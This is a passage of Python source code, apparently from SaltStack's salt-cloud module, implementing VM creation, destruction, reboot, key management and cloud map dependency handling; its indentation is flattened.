with salt.utils.context.func_globals_inject(
self.clouds[fun], __active_provider_name__=":".join([alias, driver])
):
data[alias][driver] = self.clouds[fun]()
except Exception as err: # pylint: disable=broad-except
log.error(
"Failed to get the output of '%s()': %s",
fun,
err,
exc_info_on_loglevel=logging.DEBUG,
)
return data
def size_list(self, lookup="all"):
"""
Return a mapping of all image data for available providers
"""
data = {}
lookups = self.lookup_providers(lookup)
if not lookups:
return data
for alias, driver in lookups:
fun = "{0}.avail_sizes".format(driver)
if fun not in self.clouds:
# The capability to gather sizes is not supported by this
# cloud module
log.debug(
"The '%s' cloud driver defined under '%s' provider "
"alias is unable to get the sizes information",
driver,
alias,
)
continue
if alias not in data:
data[alias] = {}
try:
with salt.utils.context.func_globals_inject(
self.clouds[fun], __active_provider_name__=":".join([alias, driver])
):
data[alias][driver] = self.clouds[fun]()
except Exception as err: # pylint: disable=broad-except
log.error(
"Failed to get the output of '%s()': %s",
fun,
err,
exc_info_on_loglevel=logging.DEBUG,
)
return data
def provider_list(self, lookup="all"):
"""
Return a mapping of all image data for available providers
"""
data = {}
lookups = self.lookup_providers(lookup)
if not lookups:
return data
for alias, driver in lookups:
if alias not in data:
data[alias] = {}
if driver not in data[alias]:
data[alias][driver] = {}
return data
def profile_list(self, provider, lookup="all"):
"""
Return a mapping of all configured profiles
"""
data = {}
lookups = self.lookup_profiles(provider, lookup)
if not lookups:
return data
for alias, driver in lookups:
if alias not in data:
data[alias] = {}
if driver not in data[alias]:
data[alias][driver] = {}
return data
def create_all(self):
"""
Create/Verify the VMs in the VM data
"""
ret = []
for vm_name, vm_details in six.iteritems(self.opts["profiles"]):
ret.append({vm_name: self.create(vm_details)})
return ret
def destroy(self, names, cached=False):
"""
Destroy the named VMs
"""
processed = {}
names = set(names)
matching = self.get_running_by_names(names, cached=cached)
vms_to_destroy = set()
parallel_data = []
for alias, drivers in six.iteritems(matching):
for driver, vms in six.iteritems(drivers):
for name in vms:
if name in names:
vms_to_destroy.add((alias, driver, name))
if self.opts["parallel"]:
parallel_data.append(
{
"opts": self.opts,
"name": name,
"alias": alias,
"driver": driver,
}
)
# destroying in parallel
if self.opts["parallel"] and parallel_data:
# set the pool size based on configuration or default to
# the number of machines we're destroying
if "pool_size" in self.opts:
pool_size = self.opts["pool_size"]
else:
pool_size = len(parallel_data)
log.info("Destroying in parallel mode; " "Cloud pool size: %s", pool_size)
# kick off the parallel destroy
output_multip = enter_mainloop(
_destroy_multiprocessing, parallel_data, pool_size=pool_size
)
# massage the multiprocessing output a bit
ret_multip = {}
for obj in output_multip:
ret_multip.update(obj)
# build up a data structure similar to what the non-parallel
# destroy uses
for obj in parallel_data:
alias = obj["alias"]
driver = obj["driver"]
name = obj["name"]
if alias not in processed:
processed[alias] = {}
if driver not in processed[alias]:
processed[alias][driver] = {}
processed[alias][driver][name] = ret_multip[name]
if name in names:
names.remove(name)
# not destroying in parallel
else:
log.info("Destroying in non-parallel mode.")
for alias, driver, name in vms_to_destroy:
fun = "{0}.destroy".format(driver)
with salt.utils.context.func_globals_inject(
self.clouds[fun], __active_provider_name__=":".join([alias, driver])
):
ret = self.clouds[fun](name)
if alias not in processed:
processed[alias] = {}
if driver not in processed[alias]:
processed[alias][driver] = {}
processed[alias][driver][name] = ret
if name in names:
names.remove(name)
# now the processed data structure contains the output from either
# the parallel or non-parallel destroy and we should finish up
# with removing minion keys if necessary
for alias, driver, name in vms_to_destroy:
ret = processed[alias][driver][name]
if not ret:
continue
vm_ = {
"name": name,
"profile": None,
"provider": ":".join([alias, driver]),
"driver": driver,
}
minion_dict = salt.config.get_cloud_config_value(
"minion", vm_, self.opts, default={}
)
key_file = os.path.join(
self.opts["pki_dir"], "minions", minion_dict.get("id", name)
)
globbed_key_file = glob.glob("{0}.*".format(key_file))
if not os.path.isfile(key_file) and not globbed_key_file:
# There's no such key file!? It might have been renamed
if isinstance(ret, dict) and "newname" in ret:
salt.utils.cloud.remove_key(self.opts["pki_dir"], ret["newname"])
continue
if os.path.isfile(key_file) and not globbed_key_file:
# Single key entry. Remove it!
salt.utils.cloud.remove_key(
self.opts["pki_dir"], os.path.basename(key_file)
)
continue
# Since we have globbed matches, there are probably some keys for which their minion
# configuration has append_domain set.
if (
not os.path.isfile(key_file)
and globbed_key_file
and len(globbed_key_file) == 1
):
# Single entry, let's remove it!
salt.utils.cloud.remove_key(
self.opts["pki_dir"], os.path.basename(globbed_key_file[0])
)
continue
# Since we can't get the profile or map entry used to create
# the VM, we can't also get the append_domain setting.
# And if we reached this point, we have several minion keys
# who's name starts with the machine name we're deleting.
# We need to ask one by one!?
print(
"There are several minion keys who's name starts "
"with '{0}'. We need to ask you which one should be "
"deleted:".format(name)
)
while True:
for idx, filename in enumerate(globbed_key_file):
print(" {0}: {1}".format(idx, os.path.basename(filename)))
selection = input("Which minion key should be deleted(number)? ")
try:
selection = int(selection)
except ValueError:
print("'{0}' is not a valid selection.".format(selection))
try:
filename = os.path.basename(globbed_key_file.pop(selection))
except Exception: # pylint: disable=broad-except
continue
delete = input("Delete '{0}'? [Y/n]? ".format(filename))
if delete == "" or delete.lower().startswith("y"):
salt.utils.cloud.remove_key(self.opts["pki_dir"], filename)
print("Deleted '{0}'".format(filename))
break
print("Did not delete '{0}'".format(filename))
break
if names and not processed:
# These machines were asked to be destroyed but could not be found
raise SaltCloudSystemExit(
"The following VM's were not found: {0}".format(", ".join(names))
)
elif names and processed:
processed["Not Found"] = names
elif not processed:
raise SaltCloudSystemExit("No machines were destroyed!")
return processed
def reboot(self, names):
"""
Reboot the named VMs
"""
ret = []
pmap = self.map_providers_parallel()
acts = {}
for prov, nodes in six.iteritems(pmap):
acts[prov] = []
for node in nodes:
if node in names:
acts[prov].append(node)
for prov, names_ in six.iteritems(acts):
fun = "{0}.reboot".format(prov)
for name in names_:
ret.append({name: self.clouds[fun](name)})
return ret
def create(self, vm_, local_master=True):
"""
Create a single VM
"""
output = {}
minion_dict = salt.config.get_cloud_config_value(
"minion", vm_, self.opts, default={}
)
alias, driver = vm_["provider"].split(":")
fun = "{0}.create".format(driver)
if fun not in self.clouds:
log.error(
"Creating '%s' using '%s' as the provider "
"cannot complete since '%s' is not available",
vm_["name"],
vm_["provider"],
driver,
)
return
deploy = salt.config.get_cloud_config_value("deploy", vm_, self.opts)
make_master = salt.config.get_cloud_config_value("make_master", vm_, self.opts)
if deploy:
if not make_master and "master" not in minion_dict:
log.warning(
"There's no master defined on the '%s' VM settings.", vm_["name"]
)
if "pub_key" not in vm_ and "priv_key" not in vm_:
log.debug("Generating minion keys for '%s'", vm_["name"])
priv, pub = salt.utils.cloud.gen_keys(
salt.config.get_cloud_config_value("keysize", vm_, self.opts)
)
vm_["pub_key"] = pub
vm_["priv_key"] = priv
else:
# Note(pabelanger): We still reference pub_key and priv_key when
# deploy is disabled.
vm_["pub_key"] = None
vm_["priv_key"] = None
key_id = minion_dict.get("id", vm_["name"])
domain = vm_.get("domain")
if vm_.get("use_fqdn") and domain:
minion_dict["append_domain"] = domain
if "append_domain" in minion_dict:
key_id = ".".join([key_id, minion_dict["append_domain"]])
if make_master is True and "master_pub" not in vm_ and "master_pem" not in vm_:
log.debug("Generating the master keys for '%s'", vm_["name"])
master_priv, master_pub = salt.utils.cloud.gen_keys(
salt.config.get_cloud_config_value("keysize", vm_, self.opts)
)
vm_["master_pub"] = master_pub
vm_["master_pem"] = master_priv
if local_master is True and deploy is True:
# Accept the key on the local master
salt.utils.cloud.accept_key(self.opts["pki_dir"], vm_["pub_key"], key_id)
vm_["os"] = salt.config.get_cloud_config_value("script", vm_, self.opts)
try:
vm_["inline_script"] = salt.config.get_cloud_config_value(
"inline_script", vm_, self.opts
)
except KeyError:
pass
try:
alias, driver = vm_["provider"].split(":")
func = "{0}.create".format(driver)
with salt.utils.context.func_globals_inject(
self.clouds[fun], __active_provider_name__=":".join([alias, driver])
):
output = self.clouds[func](vm_)
if output is not False and "sync_after_install" in self.opts:
if self.opts["sync_after_install"] not in (
"all",
"modules",
"states",
"grains",
):
log.error("Bad option for sync_after_install")
return output
# A small pause helps the sync work more reliably
time.sleep(3)
start = int(time.time())
while int(time.time()) < start + 60:
# We'll try every <timeout> seconds, up to a minute
mopts_ = salt.config.DEFAULT_MASTER_OPTS
conf_path = "/".join(self.opts["conf_file"].split("/")[:-1])
mopts_.update(
salt.config.master_config(os.path.join(conf_path, "master"))
)
client = salt.client.get_local_client(mopts=mopts_)
ret = client.cmd(
vm_["name"],
"saltutil.sync_{0}".format(self.opts["sync_after_install"]),
timeout=self.opts["timeout"],
)
if ret:
log.info(
six.u(
"Synchronized the following dynamic modules: " " {0}"
).format(ret)
)
break
except KeyError as exc:
log.exception(
"Failed to create VM %s. Configuration value %s needs " "to be set",
vm_["name"],
exc,
)
# If it's a map then we need to respect the 'requires'
# so we do it later
try:
opt_map = self.opts["map"]
except KeyError:
opt_map = False
if self.opts["parallel"] and self.opts["start_action"] and not opt_map:
log.info("Running %s on %s", self.opts["start_action"], vm_["name"])
client = salt.client.get_local_client(mopts=self.opts)
action_out = client.cmd(
vm_["name"],
self.opts["start_action"],
timeout=self.opts["timeout"] * 60,
)
output["ret"] = action_out
return output
@staticmethod
def vm_config(name, main, provider, profile, overrides):
"""
Create vm config.
:param str name: The name of the vm
:param dict main: The main cloud config
:param dict provider: The provider config
:param dict profile: The profile config
:param dict overrides: The vm's config overrides
"""
vm = main.copy()
vm = salt.utils.dictupdate.update(vm, provider)
vm = salt.utils.dictupdate.update(vm, profile)
vm.update(overrides)
vm["name"] = name
return vm
def extras(self, extra_):
"""
Extra actions
"""
output = {}
alias, driver = extra_["provider"].split(":")
fun = "{0}.{1}".format(driver, extra_["action"])
if fun not in self.clouds:
log.error(
"Creating '%s' using '%s' as the provider "
"cannot complete since '%s' is not available",
extra_["name"],
extra_["provider"],
driver,
)
return
try:
with salt.utils.context.func_globals_inject(
self.clouds[fun], __active_provider_name__=extra_["provider"]
):
output = self.clouds[fun](**extra_)
except KeyError as exc:
log.exception(
"Failed to perform %s.%s on %s. "
"Configuration value %s needs to be set",
extra_["provider"],
extra_["action"],
extra_["name"],
exc,
)
return output
def run_profile(self, profile, names, vm_overrides=None):
"""
Parse over the options passed on the command line and determine how to
handle them
"""
if profile not in self.opts["profiles"]:
msg = "Profile {0} is not defined".format(profile)
log.error(msg)
return {"Error": msg}
ret = {}
if not vm_overrides:
vm_overrides = {}
try:
with salt.utils.files.fopen(self.opts["conf_file"], "r") as mcc:
main_cloud_config = salt.utils.yaml.safe_load(mcc)
if not main_cloud_config:
main_cloud_config = {}
except KeyError:
main_cloud_config = {}
except IOError:
main_cloud_config = {}
if main_cloud_config is None:
main_cloud_config = {}
mapped_providers = self.map_providers_parallel()
profile_details = self.opts["profiles"][profile]
vms = {}
for prov, val in six.iteritems(mapped_providers):
prov_name = next(iter(val))
for node in mapped_providers[prov][prov_name]:
vms[node] = mapped_providers[prov][prov_name][node]
vms[node]["provider"] = prov
vms[node]["driver"] = prov_name
alias, driver = profile_details["provider"].split(":")
provider_details = self.opts["providers"][alias][driver].copy()
del provider_details["profiles"]
for name in names:
if name in vms:
prov = vms[name]["provider"]
driv = vms[name]["driver"]
msg = "{0} already exists under {1}:{2}".format(name, prov, driv)
log.error(msg)
ret[name] = {"Error": msg}
continue
vm_ = self.vm_config(
name,
main_cloud_config,
provider_details,
profile_details,
vm_overrides,
)
if self.opts["parallel"]:
process = multiprocessing.Process(target=self.create, args=(vm_,))
process.start()
ret[name] = {
"Provisioning": "VM being provisioned in parallel. "
"PID: {0}".format(process.pid)
}
continue
try:
# No need to inject __active_provider_name__ into the context
# here because self.create takes care of that
ret[name] = self.create(vm_)
if not ret[name]:
ret[name] = {"Error": "Failed to deploy VM"}
if len(names) == 1:
raise SaltCloudSystemExit("Failed to deploy VM")
continue
if self.opts.get("show_deploy_args", False) is False:
ret[name].pop("deploy_kwargs", None)
except (SaltCloudSystemExit, SaltCloudConfigError) as exc:
if len(names) == 1:
raise
ret[name] = {"Error": str(exc)}
return ret
def do_action(self, names, kwargs):
"""
Perform an action on a VM which may be specific to this cloud provider
"""
ret = {}
invalid_functions = {}
names = set(names)
for alias, drivers in six.iteritems(self.map_providers_parallel()):
if not names:
break
for driver, vms in six.iteritems(drivers):
if not names:
break
valid_function = True
fun = "{0}.{1}".format(driver, self.opts["action"])
if fun not in self.clouds:
log.info("'%s()' is not available. Not actioning...", fun)
valid_function = False
for vm_name, vm_details in six.iteritems(vms):
if not names:
break
if vm_name not in names:
if not isinstance(vm_details, dict):
vm_details = {}
if "id" in vm_details and vm_details["id"] in names:
vm_name = vm_details["id"]
else:
log.debug(
"vm:%s in provider:%s is not in name " "list:'%s'",
vm_name,
driver,
names,
)
continue
# Build the dictionary of invalid functions with their associated VMs.
if valid_function is False:
if invalid_functions.get(fun) is None:
invalid_functions.update({fun: []})
invalid_functions[fun].append(vm_name)
continue
with salt.utils.context.func_globals_inject(
self.clouds[fun],
__active_provider_name__=":".join([alias, driver]),
):
if alias not in ret:
ret[alias] = {}
if driver not in ret[alias]:
ret[alias][driver] = {}
# Clean kwargs of "__pub_*" data before running the cloud action call.
# Prevents calling positional "kwarg" arg before "call" when no kwarg
# argument is present in the cloud driver function's arg spec.
kwargs = salt.utils.args.clean_kwargs(**kwargs)
if kwargs:
ret[alias][driver][vm_name] = self.clouds[fun](
vm_name, kwargs, call="action"
)
else:
ret[alias][driver][vm_name] = self.clouds[fun](
vm_name, call="action"
)
names.remove(vm_name)
# Set the return information for the VMs listed in the invalid_functions dict.
missing_vms = set()
if invalid_functions:
ret["Invalid Actions"] = invalid_functions
invalid_func_vms = set()
for key, val in six.iteritems(invalid_functions):
invalid_func_vms = invalid_func_vms.union(set(val))
# Find the VMs that are in names, but not in set of invalid functions.
missing_vms = names.difference(invalid_func_vms)
if missing_vms:
ret["Not Found"] = list(missing_vms)
ret["Not Actioned/Not Running"] = list(names)
if not names:
return ret
# Don't return missing VM information for invalid functions until after we've had a
# Chance to return successful actions. If a function is valid for one driver, but
# Not another, we want to make sure the successful action is returned properly.
if missing_vms:
return ret
# If we reach this point, the Not Actioned and Not Found lists will be the same,
# But we want to list both for clarity/consistency with the invalid functions lists.
ret["Not Actioned/Not Running"] = list(names)
ret["Not Found"] = list(names)
return ret
def do_function(self, prov, func, kwargs):
"""
Perform a function against a cloud provider
"""
matches = self.lookup_providers(prov)
if len(matches) > 1:
raise SaltCloudSystemExit(
"More than one results matched '{0}'. Please specify "
"one of: {1}".format(
prov,
", ".join(
["{0}:{1}".format(alias, driver) for (alias, driver) in matches]
),
)
)
alias, driver = matches.pop()
fun = "{0}.{1}".format(driver, func)
if fun not in self.clouds:
raise SaltCloudSystemExit(
"The '{0}' cloud provider alias, for the '{1}' driver, does "
"not define the function '{2}'".format(alias, driver, func)
)
log.debug("Trying to execute '%s' with the following kwargs: %s", fun, kwargs)
with salt.utils.context.func_globals_inject(
self.clouds[fun], __active_provider_name__=":".join([alias, driver])
):
if kwargs:
return {
alias: {driver: self.clouds[fun](call="function", kwargs=kwargs)}
}
return {alias: {driver: self.clouds[fun](call="function")}}
def __filter_non_working_providers(self):
"""
Remove any mis-configured cloud providers from the available listing
"""
for alias, drivers in six.iteritems(self.opts["providers"].copy()):
for driver in drivers.copy():
fun = "{0}.get_configured_provider".format(driver)
if fun not in self.clouds:
# Mis-configured provider that got removed?
log.warning(
"The cloud driver, '%s', configured under the "
"'%s' cloud provider alias, could not be loaded. "
"Please check your provider configuration files and "
"ensure all required dependencies are installed "
"for the '%s' driver.\n"
"In rare cases, this could indicate the '%s()' "
"function could not be found.\nRemoving '%s' from "
"the available providers list",
driver,
alias,
driver,
fun,
driver,
)
self.opts["providers"][alias].pop(driver)
if alias not in self.opts["providers"]:
continue
if not self.opts["providers"][alias]:
self.opts["providers"].pop(alias)
continue
with salt.utils.context.func_globals_inject(
self.clouds[fun], __active_provider_name__=":".join([alias, driver])
):
if self.clouds[fun]() is False:
log.warning(
"The cloud driver, '%s', configured under the "
"'%s' cloud provider alias is not properly "
"configured. Removing it from the available "
"providers list.",
driver,
alias,
)
self.opts["providers"][alias].pop(driver)
if alias not in self.opts["providers"]:
continue
if not self.opts["providers"][alias]:
self.opts["providers"].pop(alias)
class Map(Cloud):
"""
Create a VM stateful map execution object
"""
def __init__(self, opts):
Cloud.__init__(self, opts)
self.rendered_map = self.read()
def interpolated_map(self, query="list_nodes", cached=False):
rendered_map = self.read().copy()
interpolated_map = {}
for profile, mapped_vms in six.iteritems(rendered_map):
names = set(mapped_vms)
if profile not in self.opts["profiles"]:
if "Errors" not in interpolated_map:
interpolated_map["Errors"] = {}
msg = (
"No provider for the mapped '{0}' profile was found. "
"Skipped VMS: {1}".format(profile, ", ".join(names))
)
log.info(msg)
interpolated_map["Errors"][profile] = msg
continue
matching = self.get_running_by_names(names, query, cached)
for alias, drivers in six.iteritems(matching):
for driver, vms in six.iteritems(drivers):
for vm_name, vm_details in six.iteritems(vms):
if alias not in interpolated_map:
interpolated_map[alias] = {}
if driver not in interpolated_map[alias]:
interpolated_map[alias][driver] = {}
interpolated_map[alias][driver][vm_name] = vm_details
try:
names.remove(vm_name)
except KeyError:
# If it's not there, then our job is already done
pass
if not names:
continue
profile_details = self.opts["profiles"][profile]
alias, driver = profile_details["provider"].split(":")
for vm_name in names:
if alias not in interpolated_map:
interpolated_map[alias] = {}
if driver not in interpolated_map[alias]:
interpolated_map[alias][driver] = {}
interpolated_map[alias][driver][vm_name] = "Absent"
return interpolated_map
def delete_map(self, query=None):
query_map = self.interpolated_map(query=query)
for alias, drivers in six.iteritems(query_map.copy()):
for driver, vms in six.iteritems(drivers.copy()):
for vm_name, vm_details in six.iteritems(vms.copy()):
if vm_details == "Absent":
query_map[alias][driver].pop(vm_name)
if not query_map[alias][driver]:
query_map[alias].pop(driver)
if not query_map[alias]:
query_map.pop(alias)
return query_map
def get_vmnames_by_action(self, action):
query_map = self.interpolated_map("list_nodes")
matching_states = {
"start": ["stopped"],
"stop": ["running", "active"],
"reboot": ["running", "active"],
}
vm_names = []
for alias, drivers in six.iteritems(query_map):
for driver, vms in six.iteritems(drivers):
for vm_name, vm_details in six.iteritems(vms):
# Only certain actions are support in to use in this case. Those actions are the
# "Global" salt-cloud actions defined in the "matching_states" dictionary above.
# If a more specific action is passed in, we shouldn't stack-trace - exit gracefully.
try:
state_action = matching_states[action]
except KeyError:
log.error(
"The use of '%s' as an action is not supported "
"in this context. Only 'start', 'stop', and "
"'reboot' are supported options.",
action,
)
raise SaltCloudException()
if (
vm_details != "Absent"
and vm_details["state"].lower() in state_action
):
vm_names.append(vm_name)
return vm_names
def read(self):
"""
Read in the specified map and return the map structure
"""
map_ = None
if self.opts.get("map", None) is None:
if self.opts.get("map_data", None) is None:
if self.opts.get("map_pillar", None) is None:
pass
elif self.opts.get("map_pillar") not in self.opts.get("maps"):
log.error(
"The specified map not found in pillar at " "'cloud:maps:%s'",
self.opts["map_pillar"],
)
raise SaltCloudNotFound()
else:
# 'map_pillar' is provided, try to use it
map_ = self.opts["maps"][self.opts.get("map_pillar")]
else:
# 'map_data' is provided, try to use it
map_ = self.opts["map_data"]
else:
# 'map' is provided, try to use it
local_minion_opts = copy.deepcopy(self.opts)
local_minion_opts["file_client"] = "local"
self.minion = salt.minion.MasterMinion(local_minion_opts)
if not os.path.isfile(self.opts["map"]):
if not (self.opts["map"]).startswith("salt://"):
log.error(
"The specified map file does not exist: '%s'", self.opts["map"]
)
raise SaltCloudNotFound()
if (self.opts["map"]).startswith("salt://"):
cached_map = self.minion.functions["cp.cache_file"](self.opts["map"])
else:
cached_map = self.opts["map"]
try:
renderer = self.opts.get("renderer", "jinja|yaml")
rend = salt.loader.render(self.opts, {})
blacklist = self.opts.get("renderer_blacklist")
whitelist = self.opts.get("renderer_whitelist")
map_ = compile_template(
cached_map, rend, renderer, blacklist, whitelist
)
except Exception as exc: # pylint: disable=broad-except
log.error(
"Rendering map %s failed, render error:\n%s",
self.opts["map"],
exc,
exc_info_on_loglevel=logging.DEBUG,
)
return {}
if "include" in map_:
map_ = salt.config.include_config(map_, self.opts["map"], verbose=False)
if not map_:
return {}
# Create expected data format if needed
for profile, mapped in six.iteritems(map_.copy()):
if isinstance(mapped, (list, tuple)):
entries = {}
for mapping in mapped:
if isinstance(mapping, six.string_types):
# Foo:
# - bar1
# - bar2
mapping = {mapping: None}
for name, overrides in six.iteritems(mapping):
if overrides is None or isinstance(overrides, bool):
# Foo:
# - bar1:
# - bar2:
overrides = {}
try:
overrides.setdefault("name", name)
except AttributeError:
log.error(
"Cannot use 'name' as a minion id in a cloud map as it "
"is a reserved word. Please change 'name' to a different "
"minion id reference."
)
return {}
entries[name] = overrides
map_[profile] = entries
continue
if isinstance(mapped, dict):
# Convert the dictionary mapping to a list of dictionaries
# Foo:
# bar1:
# grains:
# foo: bar
# bar2:
# grains:
# foo: bar
entries = {}
for name, overrides in six.iteritems(mapped):
overrides.setdefault("name", name)
entries[name] = overrides
map_[profile] = entries
continue
if isinstance(mapped, six.string_types):
# If it's a single string entry, let's make iterable because of
# the next step
mapped = [mapped]
map_[profile] = {}
for name in mapped:
map_[profile][name] = {"name": name}
return map_
def _has_loop(self, dmap, seen=None, val=None):
if seen is None:
for values in six.itervalues(dmap["create"]):
seen = []
try:
machines = values["requires"]
except KeyError:
machines = []
for machine in machines:
if self._has_loop(dmap, seen=list(seen), val=machine):
return True
else:
if val in seen:
return True
seen.append(val)
try:
machines = dmap["create"][val]["requires"]
except KeyError:
machines = []
for machine in machines:
if self._has_loop(dmap, seen=list(seen), val=machine):
return True
return False
def _calcdep(self, dmap, machine, data, level):
try:
deplist = data["requires"]
except KeyError:
return level
levels = []
for name in deplist:
try:
data = dmap["create"][name]
except KeyError:
try:
data = dmap["existing"][name]
except KeyError:
msg = "Missing dependency in cloud map"
log.error(msg)
raise SaltCloudException(msg)
levels.append(self._calcdep(dmap, name, data, level))
level = max(levels) + 1
return level
def map_data(self, cached=False):
"""
Create a data map of what to execute on
"""
ret = {"create": {}}
pmap = self.map_providers_parallel(cached=cached)
exist = set()
defined = set()
rendered_map = copy.deepcopy(self.rendered_map)
for profile_name, nodes in six.iteritems(rendered_map):
if profile_name not in self.opts["profiles"]:
msg = (
"The required profile, '{0}', defined in the map "
"does not exist. The defined nodes, {1}, will not "
"be created.".format(
profile_name, ", ".join("'{0}'".format(node) for node in nodes)
)
)
log.error(msg)
if "errors" not in ret:
ret["errors"] = {}
ret["errors"][profile_name] = msg
continue
profile_data = self.opts["profiles"].get(profile_name)
for nodename, overrides in six.iteritems(nodes):
# Get associated provider data, in case something like size
# or image is specified in the provider file. See issue #32510.
if (
"provider" in overrides
and overrides["provider"] != profile_data["provider"]
):
alias, driver = overrides.get("provider").split(":")
else:
alias, driver = profile_data.get("provider").split(":")
provider_details = copy.deepcopy(self.opts["providers"][alias][driver])
del provider_details["profiles"]
# Update the provider details information with profile data
# Profile data and node overrides should override provider data, if defined.
# This keeps map file data definitions consistent with -p usage.
salt.utils.dictupdate.update(provider_details, profile_data)
nodedata = copy.deepcopy(provider_details)
# Update profile data with the map overrides
for setting in ("grains", "master", "minion", "volumes", "requires"):
deprecated = "map_{0}".format(setting)
if deprecated in overrides:
log.warning(
"The use of '%s' on the '%s' mapping has "
"been deprecated. The preferred way now is to "
"just define '%s'. For now, salt-cloud will do "
"the proper thing and convert the deprecated "
"mapping into the preferred one.",
deprecated,
nodename,
setting,
)
overrides[setting] = overrides.pop(deprecated)
# merge minion grains from map file
if (
"minion" in overrides
and "minion" in nodedata
and "grains" in overrides["minion"]
and "grains" in nodedata["minion"]
):
nodedata["minion"]["grains"].update(overrides["minion"]["grains"])
del overrides["minion"]["grains"]
# remove minion key if now is empty dict
if not overrides["minion"]:
del overrides["minion"]
nodedata = salt.utils.dictupdate.update(nodedata, overrides)
# Add the computed information to the return data
ret["create"][nodename] = nodedata
# Add the node name to the defined set
alias, driver = nodedata["provider"].split(":")
defined.add((alias, driver, nodename))
def get_matching_by_name(name):
matches = {}
for alias, drivers in six.iteritems(pmap):
for driver, vms in six.iteritems(drivers):
for vm_name, details in six.iteritems(vms):
if vm_name == name and driver not in matches:
matches[driver] = details["state"]
return matches
for alias, drivers in six.iteritems(pmap):
for driver, vms in six.iteritems(drivers):
for name, details in six.iteritems(vms):
exist.add((alias, driver, name))
if name not in ret["create"]:
continue
# The machine is set to be created. Does it already exist?
matching = get_matching_by_name(name)
if not matching:
continue
# A machine by the same name exists
for item in matching:
if name not in ret["create"]:
# Machine already removed
break
log.warning(
"'%s' already exists, removing from " "the create map.",
name,
)
if "existing" not in ret:
ret["existing"] = {}
ret["existing"][name] = ret["create"].pop(name)
if "hard" in self.opts and self.opts["hard"]:
if self.opts["enable_hard_maps"] is False:
raise SaltCloudSystemExit(
"The --hard map can be extremely dangerous to use, "
"and therefore must explicitly be enabled in the main "
"configuration file, by setting 'enable_hard_maps' "
"to True"
)
# Hard maps are enabled, Look for the items to delete.
ret["destroy"] = exist.difference(defined)
return ret
def run_map(self, dmap):
"""
Execute the contents of the VM map
"""
if self._has_loop(dmap):
msg = "Uh-oh, that cloud map has a dependency loop!"
log.error(msg)
raise SaltCloudException(msg)
# Go through the create list and calc dependencies
for key, val in six.iteritems(dmap["create"]):
log.info("Calculating dependencies for %s", key)
level = 0
level = self._calcdep(dmap, key, val, level)
log.debug("Got execution order %s for %s", level, key)
dmap["create"][key]["level"] = level
try:
existing_list = six.iteritems(dmap["existing"])
except KeyError:
existing_list = six.iteritems({})
for key, val in existing_list:
log.info("Calculating dependencies for %s", key)
level = 0
level = self._calcdep(dmap, key, val, level)
log.debug("Got execution order %s for %s", level, key)
dmap["existing"][key]["level"] = level
# Now sort the create list based on dependencies
create_list = sorted(six.iteritems(dmap["create"]), key=lambda x: x[1]["level"])
output = {}
if self.opts["parallel"]:
parallel_data = []
master_name = None
master_minion_name = None
master_host = None
master_finger = None
try:
master_name, master_profile = next(
(
(name, profile)
for name, profile in create_list
if profile.get("make_master", False) is True
)
)
master_minion_name = master_name
log.debug("Creating new master '%s'", master_name)
if (
salt.config.get_cloud_config_value("deploy", master_profile, self.opts)
is False
):
raise SaltCloudSystemExit(
"Cannot proceed with 'make_master' when salt deployment "
"is disabled(ex: --no-deploy)."
)
# Generate the master keys
log.debug("Generating master keys for '%s'", master_profile["name"])
priv, pub = salt.utils.cloud.gen_keys(
salt.config.get_cloud_config_value("keysize", master_profile, self.opts)
)
master_profile["master_pub"] = pub
master_profile["master_pem"] = priv
# Generate the fingerprint of the master pubkey in order to
# mitigate man-in-the-middle attacks
master_temp_pub = salt.utils.files.mkstemp()
with salt.utils.files.fopen(master_temp_pub, "w") as mtp:
mtp.write(pub)
master_finger = salt.utils.crypt.pem_finger(
master_temp_pub, sum_type=self.opts["hash_type"]
)
os.unlink(master_temp_pub)
if master_profile.get("make_minion", True) is True:
master_profile.setdefault("minion", {})
if "id" in master_profile["minion"]:
master_minion_name = master_profile["minion"]["id"]
# Set this minion's master as local if the user has not set it
if "master" not in master_profile["minion"]:
master_profile["minion"]["master"] = "127.0.0.1"
if master_finger is not None:
master_profile["master_finger"] = master_finger
# Generate the minion keys to pre-seed the master:
for name, profile in create_list:
make_minion = salt.config.get_cloud_config_value(
"make_minion", profile, self.opts, default=True
)
if make_minion is False:
continue
log.debug("Generating minion keys for '%s'", profile["name"])
priv, pub = salt.utils.cloud.gen_keys(
salt.config.get_cloud_config_value("keysize", profile, self.opts)
)
profile["pub_key"] = pub
profile["priv_key"] = priv
# Store the minion's public key in order to be pre-seeded in
# the master
master_profile.setdefault("preseed_minion_keys", {})
master_profile["preseed_minion_keys"].update({name: pub})
local_master = False
if (
master_profile["minion"].get("local_master", False)
and master_profile["minion"].get("master", None) is not None
):
# The minion is explicitly defining a master and it's
# explicitly saying it's the local one
local_master = True
out = self.create(master_profile, local_master=local_master)
if not isinstance(out, dict):
log.debug(
"Master creation details is not a dictionary: {0}".format(out)
)
elif "Errors" in out:
raise SaltCloudSystemExit(
"An error occurred while creating the master, not "
"continuing: {0}".format(out["Errors"])
)
deploy_kwargs = (
self.opts.get("show_deploy_args", False) is True
and
# Get the needed data
out.get("deploy_kwargs", {})
or
# Strip the deploy_kwargs from the returned data since we don't
# want it shown in the console.
out.pop("deploy_kwargs", {})
)
master_host = deploy_kwargs.get(
"salt_host", deploy_kwargs.get("host", None)
)
if master_host is None:
raise SaltCloudSystemExit(
"Host for new master {0} was not found, "
"aborting map".format(master_name)
)
output[master_name] = out
except StopIteration:
log.debug("No make_master found in map")
# Local master?
# Generate the fingerprint of the master pubkey in order to
# mitigate man-in-the-middle attacks
master_pub = os.path.join(self.opts["pki_dir"], "master.pub")
if os.path.isfile(master_pub):
master_finger = salt.utils.crypt.pem_finger(
master_pub, sum_type=self.opts["hash_type"]
)
opts = self.opts.copy()
if self.opts["parallel"]:
# Force display_ssh_output to be False since the console will
# need to be reset afterwards
log.info(
"Since parallel deployment is in use, ssh console output "
"is disabled. All ssh output will be logged though"
)
opts["display_ssh_output"] = False
local_master = master_name is None
for name, profile in create_list:
if name in (master_name, master_minion_name):
# Already deployed, it's the master's minion
continue
if (
"minion" in profile
and profile["minion"].get("local_master", False)
and profile["minion"].get("master", None) is not None
):
# The minion is explicitly defining a master and it's
# explicitly saying it's the local one
local_master = True
if master_finger is not None and local_master is False:
profile["master_finger"] = master_finger
if master_host is not None:
profile.setdefault("minion", {})
profile["minion"].setdefault("master", master_host)
if self.opts["parallel"]:
parallel_data.append(
{
"opts": opts,
"name": name,
"profile": profile,
"local_master": local_master,
}
)
continue
# Not deploying in parallel
try:
output[name] = self.create(profile, local_master=local_master)
if (
